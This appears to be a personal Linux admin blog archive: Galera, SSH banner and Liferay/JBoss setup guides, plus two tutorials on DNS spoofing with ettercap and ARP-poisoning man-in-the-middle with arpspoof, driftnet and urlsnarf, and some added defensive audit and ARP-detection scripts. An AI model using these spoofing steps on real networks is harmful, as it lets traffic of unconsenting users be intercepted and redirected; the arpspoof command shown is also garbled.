Tuesday, July 12, 2016

spoof DNS using kali linux

1. locate the file named etter.dns
# locate etter.dns

2. open the file using nano/vi/vim

3. add your entry after the line "*wildcards in PTR are not allowed"
for example, you can add this below that line
www.msn.com A 192.168.1.8

4. go to /proc/sys/net/ipv4 and set ip_forward to 1

5. start ettercap
ettercap -T -q -M arp:remote -P dns_spoof

(enter q to abort)

reference
https://www.cybrary.it/0p3n/infosec-101-dns-spoof/

Monday, April 18, 2016

mariadb cluster

Environment I am using
OS: RHEL7
database: MariaDB 10.1.13
firewalld: off
SELinux: off

===== Install MariaDB =====

by default, your OS already includes mariadb in its yum repo, but it is an old version.
Please add this repo to get the latest version officially from MariaDB

# vim /etc/yum.repos.d/mariadb.repo

---------- mariadb.repo ----------

[mariadb]
name = MariaDB
baseurl = http://yum.mariadb.org/10.1/rhel7-amd64
gpgkey=https://yum.mariadb.org/RPM-GPG-KEY-MariaDB
gpgcheck=1

---------- END ----------

for the baseurl, if you are using centos or another distribution, you can check the path here


install mariadb using this command

# yum install mariadb-server



===== Setup MariaDB for Cluster =====

open and edit my.cnf
add the [galera] section at the end

# vim /etc/my.cnf

---------- my.cnf ----------
#
# This group is read both both by the client and the server
# use it for options that affect everything
#
[client-server]

#
# include all files from the config directory
#
!includedir /etc/my.cnf.d

[galera]

wsrep_on=ON
wsrep_provider=/usr/lib64/galera/libgalera_smm.so
binlog_format=ROW
wsrep_cluster_address='gcomm://'
wsrep_cluster_name='galera_cluster'
wsrep_node_name='node1'

---------- END ----------

for the 2nd database, just repeat the installation steps, but in my.cnf you need to change these
wsrep_cluster_address='gcomm://<node 1 IP address>'
wsrep_node_name='node2'


Start both databases
# systemctl start mariadb

log in to mysql and you can check whether it succeeded

MariaDB [(none)]> SHOW STATUS LIKE 'wsrep_cluster_size';
+--------------------+-------+
| Variable_name      | Value |
+--------------------+-------+
| wsrep_cluster_size | 2     |
+--------------------+-------+
1 row in set (0.01 sec)

the output above shows 2 nodes, which means it succeeded.

you can check for other info using this command

MariaDB [(none)]> show global status like 'wsrep_%';
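
A check for two things in the my.cnf above that cause trouble later, written as an added example (not part of the original post): a bare gcomm:// left in node1's file, and replication traffic without TLS. The hardened sample, its 192.0.2.x addresses and its certificate paths are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example, not part of the original post. Reads a my.cnf on stdin and
# prints one finding code per line for the [galera] section (the only section
# checked here, because that is where this post puts the wsrep settings):
#   EMPTY_GCOMM         wsrep_cluster_address is a bare gcomm://, so the node
#                       bootstraps a new cluster on every restart instead of
#                       rejoining the running one
#   NO_REPLICATION_TLS  wsrep_provider_options sets no socket.ssl_* option, so
#                       replication traffic between the nodes is unencrypted
audit_galera_cnf() {
    awk -v q="'" '
        /^[ \t]*\[/ {                              # section header
            section = tolower($0)
            sub(/^[ \t]*\[/, "", section); sub(/\].*$/, "", section)
            next
        }
        section != "galera" || /^[ \t]*(#|;|$)/ { next }
        {
            key = $0; sub(/[ \t]*=.*$/, "", key); sub(/^[ \t]+/, "", key)
            gsub(/-/, "_", key)                    # wsrep-on equals wsrep_on
            val = $0; sub(/^[^=]*=[ \t]*/, "", val)
            gsub("[\"" q "]", "", val); sub(/[ \t]+$/, "", val)
            settings++
            if (key == "wsrep_cluster_address" && val ~ /^gcomm:\/\/$/)
                print "EMPTY_GCOMM"
            if (key == "wsrep_provider_options" && val ~ /socket\.ssl_/)
                tls = 1
        }
        END { if (settings && !tls) print "NO_REPLICATION_TLS" }
    '
}

# node1's file as given in this post.
NODE1_CNF=$(cat <<'EOF'
[client-server]
!includedir /etc/my.cnf.d
[galera]
wsrep_on=ON
wsrep_provider=/usr/lib64/galera/libgalera_smm.so
binlog_format=ROW
wsrep_cluster_address='gcomm://'
wsrep_cluster_name='galera_cluster'
wsrep_node_name='node1'
EOF
)

# Constructed counterpart: every node lists all members (the first node is
# bootstrapped once with galera_new_cluster) and the socket.ssl_* options are set.
HARDENED_CNF=$(cat <<'EOF'
[galera]
wsrep_on=ON
wsrep_cluster_address='gcomm://192.0.2.11,192.0.2.12'
wsrep_provider_options='socket.ssl_key=/etc/my.cnf.d/tls/node.key;socket.ssl_cert=/etc/my.cnf.d/tls/node.crt;socket.ssl_ca=/etc/my.cnf.d/tls/ca.crt'
EOF
)

# On a real node: audit_galera_cnf < /etc/my.cnf
printf '%s\n' "$NODE1_CNF" | audit_galera_cnf
```

With firewalld off as in this environment, 3306 and the Galera ports (4567, 4568, 4444) are reachable by any host that can route to the node, which makes the TLS finding matter more.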

Monday, April 11, 2016

SSH Login Banner

there are 2 types of banner
1 is shown before you log in
and the other is shown after you log in successfully

-------------------------------------------------------------------
Show before login

by default, a banner is already prepared for us but it is not used.
it is located at /etc/issue.net
it shows the kernel version as the banner at login
you can use this or use your own banner file
just create a file, for example
# vim /etc/ssh/banner
and put something like this

#########################
#                       #
#  Welcome to Centos 7  #
#                       #
#########################

then enable the banner
# vim /etc/ssh/sshd_config
find and edit this

# no default banner path
#Banner none

to

# no default banner path
Banner /etc/ssh/banner

then restart the sshd service
-----------------------------------------------------------------

Show after successful login

# vim /etc/motd

and edit it to your liking

setup Liferay 7 tomcat bundle + cluster

OS = CentOS Linux release 7.2.1511 (Core)
Liferay version = liferay-portal-tomcat-7.0-ce-ga1-20160331161017956
Java = java version "1.7.0_79"

===== Liferay =====

1. download java and install it
    in my case I downloaded oracle java sdk 7 from
    http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html
    download the rpm for easy install and upgrade
    # yum localinstall jdk-7u79-linux-x64.rpm

2. download liferay and extract it.
    in my case, I extracted it and put it at /opt
    then I renamed it to liferay so it becomes /opt/liferay

3. go to /opt/liferay/tomcat-8.0.32/bin
    test run it once to confirm it works with the default settings
    # ./startup.sh
    use a browser and try to access it at
    <server ip>:8080
    and stop it after confirming it works
    # ./shutdown.sh

4. install tomcat native for better performance
    in the bin directory, extract tomcat-native.tar.gz and navigate to the native directory inside it
    # ./configure --with-apr=/usr/bin/apr-1-config --with-java-home=/usr/java/default --with-ssl=/usr/bin/openssl --prefix=/usr
    # make
    # make install

5. go back to the bin directory and extract commons-daemon-native.tar.gz
    navigate into the unix folder
    # ./configure --with-java=/usr/java/default
    # make
    # cp jsvc ../..

6. add a tomcat user for liferay to run as instead of using root
    # useradd tomcat
    # chown -R tomcat: /opt/liferay

7. in the tomcat bin directory, edit setenv.sh and change the Xmx value to suit your server memory.
    in my case, I also set the Xms value manually

====== startup script =====

since centos7 uses systemd, below is the guide on how to add the service
# cd /etc/systemd/system
# vim tomcat.service

=== tomcat.service ===

# Systemd unit file for tomcat
[Unit]
Description=Apache Tomcat Web Application Container
After=syslog.target network.target

[Service]
Type=forking
#ExecStart=/etc/init.d/tomcat start
ExecStart=/opt/liferay/tomcat/bin/startup.sh
ExecStop=/opt/liferay/tomcat/bin/shutdown.sh
User=tomcat
Group=tomcat

TimeoutStartSec=0
TimeoutStopSec=600

[Install]
WantedBy=multi-user.target

=== END ===

enable it to run at startup
# systemctl enable tomcat.service

now you can use systemctl to start and stop it to confirm it is working
# systemctl start tomcat
# systemctl stop tomcat

monitor the log at /opt/liferay/tomcat/logs/catalina.out
to make sure it starts up fully without errors


===== Apache =====

you can either use your firewall to redirect port 8080 to port 80
or
use mod_jk to pass port 80 to 8080




===== cluster =====

1. edit <liferay>/tomcat/conf/context.xml
     change <Context>
     to <Context distributable="true">

2. edit server.xml
    change <Engine name="Catalina" defaultHost="localhost">
    to <Engine name="Catalina" defaultHost="localhost" jvmRoute="node1">
    then below it add this as well

=== server.xml ===

<Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"
        channelSendOptions="6">

  <Manager className="org.apache.catalina.ha.session.BackupManager"
        expireSessionsOnShutdown="false"
        notifyListenersOnReplication="true"
        mapSendOptions="6"/>


  <Channel className="org.apache.catalina.tribes.group.GroupChannel">
    <Membership className="org.apache.catalina.tribes.membership.McastService"
        address="228.0.0.4"
        port="45564"
        frequency="500"
        dropTime="3000"/>
    <Receiver className="org.apache.catalina.tribes.transport.nio.NioReceiver"
        address="auto"
        port="5000"
        selectorTimeout="100"
        maxThreads="6"/>

    <Sender className="org.apache.catalina.tribes.transport.ReplicationTransmitter">
      <Transport className="org.apache.catalina.tribes.transport.nio.PooledParallelSender"/>
    </Sender>
    <Interceptor className="org.apache.catalina.tribes.group.interceptors.TcpFailureDetector"/>
    <Interceptor className="org.apache.catalina.tribes.group.interceptors.MessageDispatch15Interceptor"/>
    <Interceptor className="org.apache.catalina.tribes.group.interceptors.ThroughputInterceptor"/>
  </Channel>

  <Valve className="org.apache.catalina.ha.tcp.ReplicationValve"
         filter=".*\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/>

  <ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/>
</Cluster>
=== end ===

3. edit <liferay>/tomcat/conf/Catalina/localhost/ROOT.xml and add this into it

=== ROOT.xml ===

<Resource
        name="jdbc/LiferayPool"
        auth="Container"
        type="javax.sql.DataSource"
        driverClassName="com.mysql.jdbc.Driver"
        url="jdbc:mysql://<DB IP>/<DB name>?useUnicode=true&amp;characterEncoding=UTF-8"
        username="DB username"
        password="DB password"
        maxActive="100"
        maxIdle="30"
        maxWait="60000"
    />

=== end ===

4. then in <liferay>/tomcat/webapps/ROOT/WEB-INF/classes, create a portal-ext.properties file and put this into it

=== portal-ext.properties ===

jdbc.default.jndi.name=jdbc/LiferayPool

=== end ===

Wednesday, March 2, 2016

deploy liferay EE into Jboss 6 EAP manually

I am using JBoss EAP 6.4
with java 1.7.0_79
and for liferay, I am deploying Liferay Portal 6.2 EE SP14
with Liferay Portal 6.2 EE SP14 Dependencies
the dependencies are needed for liferay to run if you build it yourself

unzip the jboss eap and install java
create a folder called liferay and put the extracted jboss into it

in my case, I put liferay at /opt, so it looks like this
/opt/liferay/jboss

1. deploy dependencies


cd to the jboss folder and make a new dir like this
<jboss>/modules/com/liferay/portal/main

unzip liferay-portal-dependencies-6.2-ee-sp14 and put everything into <jboss>/modules/com/liferay/portal/main
put the mysql connector there as well if you are using mysql

in the same directory, create a file named module.xml
and put this into it

<?xml version="1.0"?>

<module xmlns="urn:jboss:module:1.0" name="com.liferay.portal">
        <resources>
                <resource-root path="hsql.jar" />

                <resource-root path="portal-service.jar" />
                <resource-root path="portlet.jar" />
                <resource-root path="mysql-connector-java-5.1.38-bin.jar" />
        </resources>
        <dependencies>
                <module name="ibm.jdk" />
                <module name="javax.api" />
                <module name="javax.mail.api" />
                <module name="javax.servlet.api" />
                <module name="javax.servlet.jsp.api" />
                <module name="javax.transaction.api" />
        </dependencies>
</module>

please edit the mysql connector file name to match yours

2. Jboss configuration

part 1

go to liferay/jboss/standalone/configuration/
and edit standalone.xml
between </extensions> and <management> (note: should be around line 27 - 30)
add this into it

<system-properties>
        <property name="org.apache.catalina.connector.URI_ENCODING" value="UTF-8"/>
        <property name="org.apache.catalina.connector.USE_BODY_ENCODING_FOR_QUERY_STRING" value="true"/>
</system-properties>

part 2

then search for deployment-scanner
and add deployment-timeout="240"

it will look something like this
<deployment-scanner path="deployments" relative-to="jboss.server.base.dir" scan-interval="5000" deployment-timeout="240"/>

part 3

then search for <subsystem xmlns="urn:jboss:domain:security:1.2">
and add this into it

<security-domain name="PortalRealm">
    <authentication>
       <login-module code="com.liferay.portal.security.jaas.PortalLoginModule" flag="required" />
    </authentication>
</security-domain>

it will look something like this

        <subsystem xmlns="urn:jboss:domain:security:1.2">
            <security-domains>
                <security-domain name="other" cache-type="default">
                    <authentication>
                        <login-module code="Remoting" flag="optional">
                            <module-option name="password-stacking" value="useFirstPass"/>
                        </login-module>
                        <login-module code="RealmDirect" flag="required">
                            <module-option name="password-stacking" value="useFirstPass"/>
                        </login-module>
                    </authentication>
                </security-domain>
                <security-domain name="jboss-web-policy" cache-type="default">
                    <authorization>
                        <policy-module code="Delegating" flag="required"/>
                    </authorization>
                </security-domain>
                <security-domain name="jboss-ejb-policy" cache-type="default">
                    <authorization>
                        <policy-module code="Delegating" flag="required"/>
                    </authorization>
                </security-domain>
                <security-domain name="PortalRealm">
                    <authentication>
                        <login-module code="com.liferay.portal.security.jaas.PortalLoginModule" flag="required" />
                    </authentication>
                </security-domain>
            </security-domains>
        </subsystem>

part 4

search for enable-welcome-root and change it to false

<virtual-server name="default-host" enable-welcome-root="false">

3. deploy Liferay war

create a ROOT.war folder in liferay/jboss/standalone/deployments
extract the Liferay .war file into the ROOT.war folder

# jar -xvf liferay.war

at the same level as ROOT.war, create an empty file called ROOT.war.dodeploy
# touch ROOT.war.dodeploy

In the ROOT.war file, open the WEB-INF/jboss-deployment-structure.xml file. In this file, replace the <module name="com.liferay.portal" /> dependency with the following configuration:

<module meta-inf="export" name="com.liferay.portal">
    <imports>
        <include path="META-INF" />
    </imports>
</module>

This allows OSGi plugins like Audience Targeting to work properly, by exposing the Portal API through the OSGi container.

reference:
1. https://www.liferay.com/group/customer/knowledge/kb/-/knowledge_base/article/23340173 (must login liferay first)

Wednesday, December 30, 2015

Liferay bundle with jboss + RHEL 7

These are the instructions on how to install jboss on Redhat Enterprise Linux 7 (RHEL 7)

you can signup and download Liferay from
https://www.liferay.com/downloads/liferay-portal/available-releases

in my case, I created /opt
and unzipped the zip file into it
# unzip liferay-portal-jboss-6.2-ee-sp14-20151105114451508.zip

before we start anything, I manually downloaded Java JDK 7 release 79 and installed it
http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html

once you have extracted liferay, try running it to confirm the file you downloaded works
# cd /opt/<Liferay>/<jboss-version>/bin
# ./standalone.sh

you can test it by accessing 127.0.0.1:8080 with a browser
by default, standalone listens on 127.0.0.1 only, so if your Linux was installed without a gui, you need to modify it.
press CTRL + C to stop jboss

# cd ..
# cd standalone/configuration/
# vim standalone.xml

----------------  Default  -------------------
    <interfaces>
        <interface name="management">
            <inet-address value="${jboss.bind.address.management:127.0.0.1}"/>
        </interface>
        <interface name="public">
            <inet-address value="${jboss.bind.address:127.0.0.1}"/>
        </interface>
        <interface name="unsecure">
            <inet-address value="${jboss.bind.address.unsecure:127.0.0.1}"/>
        </interface>
    </interfaces>

-------------- Change to -----------------
    <interfaces>
        <interface name="management">
            <inet-address value="${jboss.bind.address.management:<your server ip>}"/>
        </interface>
        <interface name="public">
            <inet-address value="${jboss.bind.address:<your server ip>}"/>
        </interface>
        <interface name="unsecure">
            <inet-address value="${jboss.bind.address.unsecure:<your server ip>}"/>
        </interface>
    </interfaces>

----------------------------------------------

restart jboss liferay and test again using <server-IP>:8080
# cd ../../bin/
# ./standalone.sh


----------------  Connecting to MySQL Database  ---------------------
you need to download the mysql connector from
https://www.mysql.com/products/connector/
choose JDBC Driver for MySQL (Connector/J)
extract the file and copy mysql-connector-java-5.1.38-bin.jar
to this location
/opt/<Liferay-location>/<jboss-version>/modules/com/liferay/portal/main/
edit module.xml
and add this under <resources>
<resource-root path="mysql-connector-java-5.1.38-bin.jar" />

example:

        <resources>
                <resource-root path="hsql.jar" />
                <resource-root path="jtds.jar" />
                <resource-root path="mysql-connector-java-5.1.38-bin.jar" />
                <resource-root path="portal-service.jar" />
                <resource-root path="portlet.jar" />
                <resource-root path="postgresql.jar" />
        </resources>

------------------  Configure httpd to divert traffic to Liferay jboss ------------------
Download and install httpd-devel
# yum install httpd-devel

download mod_jk from
https://tomcat.apache.org/download-connectors.cgi
extract the file, then configure, make and make install
it will automatically deploy mod_jk into your apache

If you encounter an error saying
no apache given
no netscape given
configure: error: Cannot find the WebServer

then you need to run configure with --with-apxs
but before that, find your apxs location
# find / -iname apxs
# ./configure --with-apxs=/usr/bin/apxs

now go to /etc/httpd/conf.d/
create worker.properties file and put this into it
# vim worker.properties

worker.list=worker1,node1,status
# the status worker's name must match its entry in worker.list
worker.status.type=status

#node1
worker.node1.port=8009
worker.node1.host=172.20.17.64
worker.node1.type=ajp13
worker.node1.lbfactor=1
worker.node1.ping_mode=A

# Load-balancing behaviour
worker.worker1.type=lb
worker.worker1.balance_workers=node1
worker.worker1.sticky_session=1


then create mod_jk.conf file and put this into it
# vim mod_jk.conf

LoadModule jk_module modules/mod_jk.so

<IfModule mod_jk.c>
JkWorkersFile /etc/httpd/conf.d/worker.properties
JkShmFile     /var/log/httpd/mod_jk.shm
JkLogFile     /var/log/httpd/mod_jk.log
JkLogLevel    info
JkLogStampFormat "[%a %b %d %H:%M:%S %Y] "

JkMount /* worker1
</IfModule>


Before we start apache, we need to configure jboss to listen on port 8009 (AJP 1.3)
by default it is disabled in standalone.xml

# cd /opt/liferay-portal-6.2-ee-sp14/jboss-7.1.1/standalone/configuration/
# vim standalone.xml

----- default ------
        <subsystem xmlns="urn:jboss:domain:web:1.1" default-virtual-server="default-host" native="false">
            <configuration>
                <jsp-configuration development="true"/>
            </configuration>
            <connector name="http" protocol="HTTP/1.1" scheme="http" socket-binding="http"/>
            <virtual-server name="default-host" enable-welcome-root="false">
                <alias name="localhost"/>
                <alias name="example.com"/>
            </virtual-server>
        </subsystem>

------- change to  --------
        <subsystem xmlns="urn:jboss:domain:web:1.1" default-virtual-server="default-host" native="false">
            <configuration>
                <jsp-configuration development="true"/>
            </configuration>
            <connector name="ajp" protocol="AJP/1.3" scheme="http" socket-binding="ajp"/>
            <virtual-server name="default-host" enable-welcome-root="false">
                <alias name="localhost"/>
                <alias name="example.com"/>
            </virtual-server>
        </subsystem>
-----------------------------

Start the jboss and httpd services and test by accessing your server ip without port 8080
once you can see the pages, we need to create a startup script
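
The interface change earlier moves the management interface off 127.0.0.1, and the step above opens AJP on 8009, although only administrators and httpd need to reach them. This added example (not part of the original post) lists which of those listeners are reachable from the network, assuming the JBoss AS 7 default ports; the ss output in it is constructed, using the address from worker.properties.

```bash
#!/usr/bin/env bash
# Added example, not part of the original post. Reads `ss -ltn` output on
# stdin and lists JBoss AS 7 listeners that are reachable from the network:
# the management ports 9990 (HTTP console) and 9999 (native), and AJP 8009.
# Output: "<role> <address>:<port> <scope>", scope is "any" for a wildcard bind.
exposed_jboss_listeners() {
    awk '
        $1 != "LISTEN" { next }                  # also skips the header row
        {
            port = $4; sub(/^.*:/, "", port)     # text after the last colon
            addr = $4; sub(/:[^:]*$/, "", addr)  # everything before it
            if (port == "9990" || port == "9999") role = "management"
            else if (port == "8009") role = "ajp"
            else next
            if (addr ~ /^127\./ || addr == "[::1]") next   # loopback only
            scope = (addr == "*" || addr == "0.0.0.0" || addr == "[::]") ? "any" : "specific"
            print role, addr ":" port, scope
        }
    ' | sort
}

# Constructed sample: listeners after following this post as written.
SS_AS_CONFIGURED='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    172.20.17.64:9990  0.0.0.0:*
LISTEN 0      128    172.20.17.64:9999  0.0.0.0:*
LISTEN 0      128    172.20.17.64:8009  0.0.0.0:*
LISTEN 0      128    0.0.0.0:80         0.0.0.0:*
LISTEN 0      128    127.0.0.1:25       0.0.0.0:*'

# Constructed sample: management left on 127.0.0.1 and AJP bound to loopback
# because httpd runs on the same host.
SS_LOOPBACK_ONLY='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    127.0.0.1:9990     0.0.0.0:*
LISTEN 0      128    127.0.0.1:9999     0.0.0.0:*
LISTEN 0      128    127.0.0.1:8009     0.0.0.0:*
LISTEN 0      128    0.0.0.0:80         0.0.0.0:*'

# On a real host: ss -ltn | exposed_jboss_listeners
printf '%s\n' "$SS_AS_CONFIGURED" | exposed_jboss_listeners
```

Any line it prints is a listener to restrict with a firewall rule to the hosts that need it, or to move back to 127.0.0.1.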

---------- startup --------------

by default, the jboss/bin/init.d directory already has a startup script named jboss-as-standalone.sh
If you are using RHEL 6 or earlier, you can just make a symlink from /etc/init.d/jboss pointing to this file
for RHEL7, it is a bit tricky since it uses systemd

but before that, edit jboss-as-standalone.sh and define
JBOSS_CONF="/opt/<liferay-location>/<jboss-ver>/bin/init.d/jboss-as.conf"
JBOSS_HOME=/opt/<liferay-location>/<jboss-ver>

then go to /usr/lib/systemd/system
create jboss.service file and put this

[Unit]
Description=Jboss Application Server
After=syslog.target
After=network.target


[Service]
Type=forking
PIDFile=/var/run/jboss-as/jboss-as-standalone.pid
ExecStart=/opt/<liferay-location>/<jboss-ver>/bin/init.d/jboss-as-standalone.sh start
ExecStop=/opt/<liferay-location>/<jboss-ver>/bin/init.d/jboss-as-standalone.sh stop
TimeoutStartSec=300
TimeoutStopSec=300


[Install]
WantedBy=multi-user.target


then go to /etc/systemd/system/multi-user.target.wants and create a symlink pointing to the file just created
then enable it in the startup list
# systemctl enable jboss.service




Monday, August 10, 2015

man in the middle - hacking

use netdiscover to find the IP if you are uncertain which IP range is in use
use nmap to find out more info
# nmap 172.20.1.30
or
# nmap 172.20.1.1/24

commands used
Arpspoof
Driftnet

setup port forwarding
Change the value in your /proc/sys/net/ipv4/ip_forward from 0 to 1 (see http://www.hacking-tutorial.com/tips-and-trick/how-to-set-up-port-forwarding-in-linux-and-windows/#sthash.YQIMORR4.dpuf)




Victim IP address : 192.168.8.90

Attacker network interface : eth0; with IP address : 192.168.8.93

Router IP address : 192.168.8.8

Then set up arpspoof to capture all packets from the router to the victim.
# 168.8.90 192.168.8.8

After step three and four, all the packets sent or received by the victim should be going through the attacker machine.
Now we can try to use driftnet to monitor all of the victim's image traffic. According to its website,
Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.
to run driftnet, we just run this
# driftnet -i eth0

To stop driftnet, just close the driftnet window or press CTRL + C in the terminal

For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this command
# urlsnarf -i eth0

and urlsnarf will start capturing all website addresses visited by the victim machine.

When the victim browses a website, the attacker will know the address the victim visited.
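
Both this post and the ettercap post at the top of the page depend on ARP poisoning, which leaves a visible trace in the neighbour table of the affected host. The following is an added example (not from the original posts) of checking for that trace from the defender's side; the MAC addresses and the recorded gateway MAC are constructed, and the IP addresses are the ones used above.

```bash
#!/usr/bin/env bash
# Added example, not from the original post: read `ip -4 neigh show` style
# lines and report the traces ARP poisoning leaves in a neighbour table.

# Constructed sample: neighbour table of 192.168.8.90 while its entry for the
# router 192.168.8.8 is poisoned. MAC addresses are made up.
SAMPLE_NEIGH='192.168.8.8 dev eth0 lladdr 02:00:00:00:00:93 REACHABLE
192.168.8.93 dev eth0 lladdr 02:00:00:00:00:93 STALE
192.168.8.20 dev eth0 lladdr 02:00:00:00:00:20 REACHABLE
192.168.8.21 dev eth0  FAILED'

# Print "MAC ip1,ip2,..." for every MAC bound to two or more IPv4 addresses.
# A host with several addresses on one NIC also shows up, so treat a hit as
# something to verify, not as proof.
find_shared_macs() {
    awk '
        index($1, ":") { next }                 # skip IPv6 neighbours
        {
            mac = ""
            for (i = 1; i < NF; i++)
                if ($i == "lladdr") mac = tolower($(i + 1))
            if (mac == "") next                 # FAILED/INCOMPLETE: no MAC
            if (seen[mac, $1]++) next           # same pair listed twice
            ips[mac] = (count[mac] ? ips[mac] "," : "") $1
            count[mac]++
        }
        END { for (m in count) if (count[m] > 1) print m, ips[m] }
    ' | sort
}

# Compare the gateway entry with a MAC recorded while the network was known
# to be clean. Exit status: 0 match, 1 mismatch, 2 gateway not in the table.
# This still works when the poisoning host's own IP is absent from the table.
check_gateway_mac() {
    local gw="$1" expected
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    awk -v gw="$gw" -v want="$expected" '
        $1 == gw {
            for (i = 1; i < NF; i++)
                if ($i == "lladdr") { found = 1; got = tolower($(i + 1)) }
        }
        END { if (!found) exit 2; exit ((got == want) ? 0 : 1) }
    '
}

# Demo on the constructed sample; on a live host pipe in: ip -4 neigh show
printf '%s\n' "$SAMPLE_NEIGH" | find_shared_macs
if ! printf '%s\n' "$SAMPLE_NEIGH" | check_gateway_mac 192.168.8.8 02:00:00:00:00:08; then
    echo "gateway 192.168.8.8 no longer maps to its recorded MAC"
fi
```

A static ARP entry for the gateway, or dynamic ARP inspection on the switch, prevents the poisoned mapping from being accepted in the first place.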